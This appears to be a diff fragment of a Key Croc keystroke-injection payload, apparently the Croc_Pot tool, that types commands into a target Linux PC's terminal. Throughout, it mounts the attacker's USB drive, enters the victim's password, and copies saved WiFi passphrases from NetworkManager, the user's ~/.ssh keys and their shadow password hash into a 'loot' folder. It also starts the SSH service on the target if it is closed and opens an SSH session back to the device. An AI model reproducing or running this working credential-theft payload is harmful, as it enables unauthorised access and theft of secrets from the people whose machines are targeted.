& save to tools/Croc_Pot/shark_ip.txt + Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" + Q ENTER ; sleep 2 + #---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt + Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" + Q ENTER ; sleep 2 + #---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt + Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt + Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt + Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt + Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH + Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/" + Q ENTER ; sleep 2 + #---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt + Q STRING "sudo getent shadow \$(whoami) | tee \${PC_LOOT}/target_hash_passwd" + Q ENTER ; sleep 2 + #---> Return back to ATTACKMODE HID mode + ATTACKMODE HID + sleep 1 ;; + ${TARGET_HOSTNAME}) + #---> Start mate-terminal -->Parrot OS<-- + Q ALT F2 + sleep 1 + Q STRING "mate-terminal" + Q ENTER ; sleep 1 + #---> Check numlock state on or off + Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER + Q ENTER ; sleep 3 + #---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable + Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/" + Q ENTER ; sleep 2 + #---> Entering Linux passwd + Q STRING "${PC_PW}" + Q ENTER ; sleep 1 + #---> Place keycroc usb drive into variable + Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" + Q ENTER ; sleep 1 + Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot" + Q ENTER ; sleep 1 + #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "whoami | sudo tee \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "hostname -I | awk '{print \$1}' | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}" + Q ENTER ; sleep 1 + #---> Check with nmap SSH status of target pc + if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then + Q STRING "sudo systemctl start ssh" + Q ENTER + else + Q STRING "SSH is running" + Q ENTER + fi + sleep 1 + #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt + Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" + Q ENTER ; sleep 5 + #---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt + Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" + Q ENTER ; sleep 2 + #---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt + Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt + Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt + Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt + Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH + Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/" + Q ENTER ; sleep 2 + #---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt + Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd" + Q ENTER ; sleep 2 + #---> Unmount keycroc usb drive + Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" + Q ENTER ; sleep 1 + #---> Return back to ATTACKMODE HID mode + ATTACKMODE HID + #---> Remove keycroc directory off target pc + Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" + Q ENTER ; sleep 1 ;; + *) + #---> Start linux distributions terminal xterm + #---> Unsure of which linux distribution this will work on + Q ALT F2 + sleep 1 + Q STRING "xterm" + Q ENTER ; sleep 1 + #---> Check numlock state on or off + Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER + Q ENTER ; sleep 3 + #---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable + Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/" + Q ENTER ; sleep 1 + #---> Entering Linux passwd + Q STRING "${PC_PW}" + Q ENTER ; sleep 1 + #---> Place keycroc usb drive into variable + Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" + Q ENTER ; sleep 1 + #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "whoami | sudo tee \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "hostname -I | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}" + Q ENTER ; sleep 1 + #---> Check with nmap SSH status of target pc + if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then + Q STRING "sudo systemctl start ssh" + Q ENTER + else + Q STRING "SSH is running" + Q ENTER + fi + sleep 1 + #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt + Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" + Q ENTER ; sleep 5 + #---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt + Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" + Q ENTER ; sleep 2 + #---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt + Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt + Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt + Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt + Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt" + Q ENTER ; sleep 2 + #---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH + Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/" + Q ENTER ; sleep 2 + #---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt + Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd" + Q ENTER ; sleep 2 + #---> Unmount keycroc usb drive + Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" + Q ENTER ; sleep 1 + #---> Return back to ATTACKMODE HID mode + ATTACKMODE HID + #---> Remove keycroc directory off target pc + Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" + Q ENTER ; sleep 1 ;; esac ;; esac #---> Start SSH session with target PC Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" -Q ENTER -sleep 2 +Q ENTER ; sleep 2 #---> Entering keycroc passwd Q STRING "${CROC_PW}" -Q ENTER -sleep 1 +Q ENTER ; sleep 1 #---> Starting Croc_Pot Q STRING "/root/udisk/tools/Croc_Pot.sh" Q ENTER